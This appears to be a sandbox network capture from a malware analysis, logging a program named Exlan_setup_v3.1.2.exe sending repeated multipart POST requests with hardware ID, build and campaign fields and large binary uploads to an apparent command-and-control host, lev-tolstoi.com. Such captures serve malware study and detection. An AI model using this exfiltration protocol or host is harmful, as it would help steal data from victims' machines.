2024-12-31 07:17:01 UTC	1369	IN	Data Raw: 70 34 73 47 38 4b 6e 69 67 42 50 36 57 41 43 30 68 78 66 6b 74 49 48 2f 58 4a 45 48 7a 4d 6f 45 36 43 4f 38 47 38 65 36 58 37 37 36 6a 34 61 6f 6a 62 62 38 62 30 5a 59 41 5a 54 61 43 34 57 6b 69 66 70 46 77 43 2f 73 6e 69 7a 6b 53 70 6b 2b 2f 35 6f 79 39 35 2b 37 4c 71 44 39 77 72 52 48 38 6e 51 41 6a 4b 4d 6e 79 4a 53 4a 33 32 69 64 48 73 6e 76 50 4d 78 6a 76 45 50 48 48 68 4c 7a 78 34 4d 36 78 4c 6d 54 70 43 62 36 43 54 79 49 6c 6a 4b 42 70 4a 6e 6e 61 4c 45 76 2b 4e 59 73 35 41 4c 31 48 74 75 36 47 70 50 54 70 78 37 30 7a 64 36 49 5a 39 6f 6b 44 4b 7a 76 4a 36 6a 74 6c 50 4a 45 76 55 37 4a 74 7a 77 49 48 76 31 69 79 71 37 36 35 35 66 58 4c 74 7a 51 2f 74 6c 6a 70 32 77 67 70 61 5a 53 34 4c 79 70 37 30 69 64 4b 2b 7a 6d 43 4d 51 6d 71 53 62 66 74 68 61 Data Ascii: p4sG8KnigBP6WAC0hxfktIH/XJEHzMoE6CO8G8e6X776j4aojbb8b0ZYAZTaC4WkifpFwC/snizkSpk+/5oy95+7LqD9wrRH8nQAjKMnyJSJ32idHsnvPMxjvEPHHhLzx4M6xLmTpCb6CTyIljKBpJnnaLEv+NYs5AL1Htu6GpPTpx70zd6IZ9okDKzvJ6jtlPJEvU7JtzwIHv1iyq7655fXLtzQ/tljp2wgpaZS4Lyp70idK+zmCMQmqSbftha
2024-12-31 07:17:01 UTC	1369	IN	Data Raw: 2b 69 63 78 73 46 62 33 6c 30 39 39 61 63 2f 2f 4b 69 52 34 32 43 52 45 39 54 47 64 50 67 65 39 53 62 44 69 67 71 50 6d 37 73 32 77 4f 58 61 6b 47 76 32 63 43 43 6f 73 6a 4c 5a 70 49 6d 71 52 63 41 76 54 4f 49 51 34 57 2f 55 49 72 71 65 57 37 2b 48 76 67 4f 4a 34 66 36 4d 54 2b 70 59 4d 4b 69 72 65 2b 53 38 33 63 74 77 69 57 66 67 2b 69 6a 6b 4e 6f 6b 75 33 37 34 53 6a 39 4f 72 41 75 54 4d 2f 35 31 62 33 67 30 39 39 61 65 2f 76 50 79 39 31 33 54 35 41 38 7a 61 5a 4f 52 44 76 42 76 48 34 69 4c 36 6d 75 39 61 71 4c 33 69 32 57 4f 6e 62 43 43 6c 70 6c 4c 67 76 4c 48 54 57 4c 6b 58 67 4d 49 6b 37 44 36 5a 42 74 65 47 4d 72 2b 4c 6e 78 37 38 37 63 36 49 52 38 35 51 4c 4c 43 66 46 39 32 6c 72 4d 74 59 77 43 36 70 31 72 69 38 44 6f 30 58 78 39 73 47 32 70 75 54 Data Ascii: +icxsFb3l099ac//KiR42CRE9TGdPge9SbDigqPm7s2wOXakGv2cCCosjLZpImqRcAvTOIQ4W/UIrqeW7+HvgOJ4f6MT+pYMKire+S83ctwiWfg+ijkNoku374Sj9OrAuTM/51b3g099ae/vPy913T5A8zaZORDvBvH4iL6mu9aqL3i2WOnbCClplLgvLHTWLkXgMIk7D6ZBteGMr+Lnx787c6IR85QLLCfF92lrMtYwC6p1ri8Do0Xx9sG2puT
2024-12-31 07:17:01 UTC	291	IN	Data Raw: 2b 6c 4f 73 4c 73 45 4d 79 7a 4c 37 6d 73 51 63 64 38 6d 54 4f 52 31 6b 41 74 4f 37 30 65 72 71 64 65 57 2f 36 50 48 74 6e 67 6e 36 51 50 33 6d 77 67 2f 50 38 76 30 4f 43 35 2f 33 51 70 45 39 53 4f 4d 4f 77 4f 2b 51 66 33 69 67 75 2b 6f 6f 38 65 69 65 43 66 70 4f 66 65 4e 44 41 6f 71 33 66 46 70 61 7a 4c 57 50 67 75 71 64 62 46 30 45 71 78 59 73 75 61 65 6b 61 61 37 32 59 52 34 64 4c 38 52 34 4a 67 5a 4c 69 54 41 36 52 64 6c 4b 6f 56 36 47 61 42 6e 33 53 74 41 73 48 66 2f 71 59 37 76 76 74 72 5a 2b 69 34 2f 38 55 53 2b 32 78 31 6c 63 59 79 2f 4b 6a 64 67 31 79 74 64 38 58 4b 78 43 69 65 35 51 72 62 35 69 4c 6a 70 6f 34 37 36 4e 7a 2f 78 4c 37 43 53 43 44 34 34 32 76 55 35 49 6a 4c 75 5a 67 76 71 64 64 64 30 4e 61 78 47 76 2b 36 5a 76 71 76 45 31 72 41 2f Data Ascii: +lOsLsEMyzL7msQcd8mTOR1kAtO70erqdeW/6PHtngn6QP3mwg/P8v0OC5/3QpE9SOMOwO+Qf3igu+oo8eieCfpOfeNDAoq3fFpazLWPguqdbF0EqxYsuaekaa72YR4dL8R4JgZLiTA6RdlKoV6GaBn3StAsHf/qY7vvtrZ+i4/8US+2x1lcYy/Kjdg1ytd8XKxCie5Qrb5iLjpo476Nz/xL7CSCD442vU5IjLuZgvqddd0NaxGv+6ZvqvE1rA/
2024-12-31 07:17:01 UTC	1369	IN	Data Raw: 32 63 63 61 0d 0a 44 68 2f 36 50 57 2b 6d 41 74 35 31 62 69 32 31 64 6c 62 73 2f 71 4f 79 4e 78 78 79 73 4d 7a 41 75 6f 4c 67 32 70 58 36 44 58 73 61 6a 38 37 73 61 74 4b 54 4f 38 46 66 36 56 43 44 4e 70 67 72 67 6d 5a 53 72 6f 61 41 4f 79 43 73 46 30 47 4f 38 51 38 64 79 4d 6f 65 6a 6b 31 71 74 31 57 4c 4d 62 39 6f 77 65 5a 57 65 4d 2f 6d 6c 39 49 4a 39 6f 54 2b 4e 31 31 32 52 53 39 42 33 69 76 74 2f 39 2b 61 33 5a 2b 69 34 2f 38 55 53 2b 32 78 31 6c 63 59 79 2f 4b 6a 64 67 31 79 74 64 38 58 4b 78 43 69 36 6f 54 72 54 75 6e 2b 33 49 36 4e 53 39 65 44 48 70 47 62 44 44 4e 6d 56 68 6a 4d 64 6e 5a 57 71 52 63 41 76 48 4e 6f 45 36 42 37 6c 5a 2f 4d 65 49 71 65 50 6b 30 50 67 57 64 4c 30 52 73 4e 56 50 49 32 6d 55 71 47 64 6c 64 73 42 6f 45 36 4a 6e 31 47 46 Data Ascii: 2ccaDh/6PW+mAt51bi21dlbs/qOyNxxysMzAuoLg2pX6DXsaj87satKTO8Ff6VCDNpgrgmZSroaAOyCsF0GO8Q8dyMoejk1qt1WLMb9oweZWeM/ml9IJ9oT+N112RS9B3ivt/9+a3Z+i4/8US+2x1lcYy/Kjdg1ytd8XKxCi6oTrTun+3I6NS9eDHpGbDDNmVhjMdnZWqRcAvHNoE6B7lZ/MeIqePk0PgWdL0RsNVPI2mUqGdldsBoE6Jn1GF
2024-12-31 07:17:01 UTC	1369	IN	Data Raw: 39 65 61 72 4f 6a 74 78 36 77 70 50 2b 64 57 2f 39 74 58 48 47 6d 45 75 42 5a 72 4d 73 6c 6f 45 37 49 41 6a 44 6f 4f 71 46 36 67 70 4b 69 68 34 65 4c 57 71 69 39 77 36 56 69 77 6e 55 39 39 65 34 4b 34 4c 54 51 79 69 58 67 5a 71 57 44 63 59 31 44 39 56 2f 2f 77 7a 37 6d 6d 75 35 4c 30 65 47 33 70 54 72 44 63 44 44 63 37 79 76 73 2f 4a 6a 58 76 46 6d 7a 38 4d 6f 34 69 45 4c 68 48 2f 73 65 35 6a 74 6a 64 31 62 6b 32 63 61 34 41 34 64 74 42 5a 53 61 4d 6f 42 42 6c 4f 70 45 58 42 62 49 74 7a 32 78 41 6d 6b 75 2f 35 34 69 35 39 36 37 6e 74 44 39 2b 76 77 62 6e 6c 45 41 4c 48 2b 32 34 5a 32 56 30 6b 58 41 5a 76 48 57 4c 4a 55 44 33 47 4f 4f 79 32 76 79 78 73 35 4b 6c 64 6d 62 70 41 4c 44 44 58 57 74 70 33 72 68 78 5a 54 58 53 4f 6c 6e 30 4e 70 6b 33 52 35 46 32 Data Ascii: 9earOjtx6wpP+dW/9tXHGmEuBZrMsloE7IAjDoOqF6gpKih4eLWqi9w6ViwnU99e4K4LTQyiXgZqWDcY1D9V//wz7mmu5L0eG3pTrDcDDc7yvs/JjXvFmz8Mo4iELhH/se5jtjd1bk2ca4A4dtBZSaMoBBlOpEXBbItz2xAmku/54i5967ntD9+vwbnlEALH+24Z2V0kXAZvHWLJUD3GOOy2vyxs5KldmbpALDDXWtp3rhxZTXSOln0Npk3R5F2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	172.67.157.254	443	7584	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:17:02 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3RYI71CX57RX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18124 Host: lev-tolstoi.com
2024-12-31 07:17:02 UTC	15331	OUT	Data Raw: 2d 2d 33 52 59 49 37 31 43 58 35 37 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 43 31 34 41 38 44 44 33 36 43 42 35 45 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 33 52 59 49 37 31 43 58 35 37 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 52 59 49 37 31 43 58 35 37 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 6e 39 0d 0a 2d 2d 33 52 59 49 37 31 43 58 35 37 52 58 0d 0a 43 6f 6e Data Ascii: --3RYI71CX57RXContent-Disposition: form-data; name="hwid"FE2C14A8DD36CB5E37CB803551D62973--3RYI71CX57RXContent-Disposition: form-data; name="pid"2--3RYI71CX57RXContent-Disposition: form-data; name="lid"Dvh8ui--n9--3RYI71CX57RXCon
2024-12-31 07:17:02 UTC	2793	OUT	Data Raw: ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
2024-12-31 07:17:02 UTC	1123	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:17:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cd8k3l661mv9umbohbfjro1gf4; expires=Sat, 26 Apr 2025 01:03:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BdzOQkHwmjAhY4EfioKeO7k1WrWjRZCGyObrmmKQsjOq8t8C2ufuu1JDj2OhMWa6PvXMfwc9MVqI5o8VO5lRzvHWbRVSgfCZascfyJ3nrjIaUNUyoQjZ%2Blu0Rq9ENxMXHnw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa87cd21db71902-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1523&min_rtt=1510&rtt_var=592&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19079&delivery_rate=1809169&cwnd=219&unsent_bytes=0&cid=c9d41d3f9af0fe5d&ts=598&x=0"
2024-12-31 07:17:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 07:17:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	172.67.157.254	443	7584	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:17:03 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ND4DV1WXT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8727 Host: lev-tolstoi.com
2024-12-31 07:17:03 UTC	8727	OUT	Data Raw: 2d 2d 4e 44 34 44 56 31 57 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 43 31 34 41 38 44 44 33 36 43 42 35 45 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 4e 44 34 44 56 31 57 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 44 34 44 56 31 57 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 6e 39 0d 0a 2d 2d 4e 44 34 44 56 31 57 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 Data Ascii: --ND4DV1WXTContent-Disposition: form-data; name="hwid"FE2C14A8DD36CB5E37CB803551D62973--ND4DV1WXTContent-Disposition: form-data; name="pid"2--ND4DV1WXTContent-Disposition: form-data; name="lid"Dvh8ui--n9--ND4DV1WXTContent-Disposi
2024-12-31 07:17:03 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:17:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3bak43ke6sdtvskn52m696lbvi; expires=Sat, 26 Apr 2025 01:03:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GhPDikuUHCWdoMa77jY3YhfBVhTmzfs2fpvTeMqvHPu6rpnyyONm%2Fv99lXN2QXFw8VJmydOUoaX2FhngDShW9a%2FBdwf9PsbUwxItggDZVhDVPL0bxF5f1WXbX0Guf4j0n%2FQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa87cd8ff1a7cff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1886&min_rtt=1874&rtt_var=727&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2835&recv_bytes=9656&delivery_rate=1481481&cwnd=222&unsent_bytes=0&cid=d5cc2f118b81cf0e&ts=468&x=0"
2024-12-31 07:17:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 07:17:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	172.67.157.254	443	7584	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:17:04 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YU1FPM536H5JQEA01QP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20440 Host: lev-tolstoi.com
2024-12-31 07:17:04 UTC	15331	OUT	Data Raw: 2d 2d 59 55 31 46 50 4d 35 33 36 48 35 4a 51 45 41 30 31 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 43 31 34 41 38 44 44 33 36 43 42 35 45 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 59 55 31 46 50 4d 35 33 36 48 35 4a 51 45 41 30 31 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 59 55 31 46 50 4d 35 33 36 48 35 4a 51 45 41 30 31 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 6e 39 Data Ascii: --YU1FPM536H5JQEA01QPContent-Disposition: form-data; name="hwid"FE2C14A8DD36CB5E37CB803551D62973--YU1FPM536H5JQEA01QPContent-Disposition: form-data; name="pid"3--YU1FPM536H5JQEA01QPContent-Disposition: form-data; name="lid"Dvh8ui--n9
2024-12-31 07:17:04 UTC	5109	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-12-31 07:17:06 UTC	1132	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:17:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tnstdh9mnh2vu858ms32g1ul5i; expires=Sat, 26 Apr 2025 01:03:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UVOyerMOCYVJDBrUp8%2BMQ8ynbnRgoBmDYY8oyjs7%2Fnq1LCV1cQvruefMu5d3kYXA%2FIfbmpVQAIdoj%2Fhjsz0124Gs9At33PKrjvC%2FA4zF4Sp9zjIsRxPQY5xog3DJ5qc3HfM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa87ce23f826a57-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1724&rtt_var=663&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21402&delivery_rate=1630374&cwnd=231&unsent_bytes=0&cid=0326fc27339c9b18&ts=1452&x=0"
2024-12-31 07:17:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 07:17:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	172.67.157.254	443	7584	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:17:06 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HPSAD4V67V4EOF1VX7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1254 Host: lev-tolstoi.com
2024-12-31 07:17:06 UTC	1254	OUT	Data Raw: 2d 2d 48 50 53 41 44 34 56 36 37 56 34 45 4f 46 31 56 58 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 43 31 34 41 38 44 44 33 36 43 42 35 45 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 48 50 53 41 44 34 56 36 37 56 34 45 4f 46 31 56 58 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 50 53 41 44 34 56 36 37 56 34 45 4f 46 31 56 58 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 6e 39 0d 0a 2d Data Ascii: --HPSAD4V67V4EOF1VX7Content-Disposition: form-data; name="hwid"FE2C14A8DD36CB5E37CB803551D62973--HPSAD4V67V4EOF1VX7Content-Disposition: form-data; name="pid"1--HPSAD4V67V4EOF1VX7Content-Disposition: form-data; name="lid"Dvh8ui--n9-
2024-12-31 07:17:07 UTC	1120	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:17:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jcllva5ohbfpm344ek2ofv5plr; expires=Sat, 26 Apr 2025 01:03:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5UgtnUUGAFciyVOfef4Gqow45n3hzk1mmUwtRfPPaSGgF7aMnM6rqOhCDrFwiyp7SsKu6VDBg7SLSB3ifWRZYS5L5aP1lYuuMs8JLfYNRh6wganpjo6ugUTVboqR3mh8%2B4Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa87cef0b36c440-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=584&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2170&delivery_rate=1872995&cwnd=245&unsent_bytes=0&cid=2d2ad8708410bd58&ts=423&x=0"
2024-12-31 07:17:07 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 07:17:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	172.67.157.254	443	7584	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:17:08 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QX88Z4NZ3JMSD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570380 Host: lev-tolstoi.com
2024-12-31 07:17:08 UTC	15331	OUT	Data Raw: 2d 2d 51 58 38 38 5a 34 4e 5a 33 4a 4d 53 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 43 31 34 41 38 44 44 33 36 43 42 35 45 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 51 58 38 38 5a 34 4e 5a 33 4a 4d 53 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 58 38 38 5a 34 4e 5a 33 4a 4d 53 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 6e 39 0d 0a 2d 2d 51 58 38 38 5a 34 4e 5a 33 4a 4d 53 44 0d Data Ascii: --QX88Z4NZ3JMSDContent-Disposition: form-data; name="hwid"FE2C14A8DD36CB5E37CB803551D62973--QX88Z4NZ3JMSDContent-Disposition: form-data; name="pid"1--QX88Z4NZ3JMSDContent-Disposition: form-data; name="lid"Dvh8ui--n9--QX88Z4NZ3JMSD
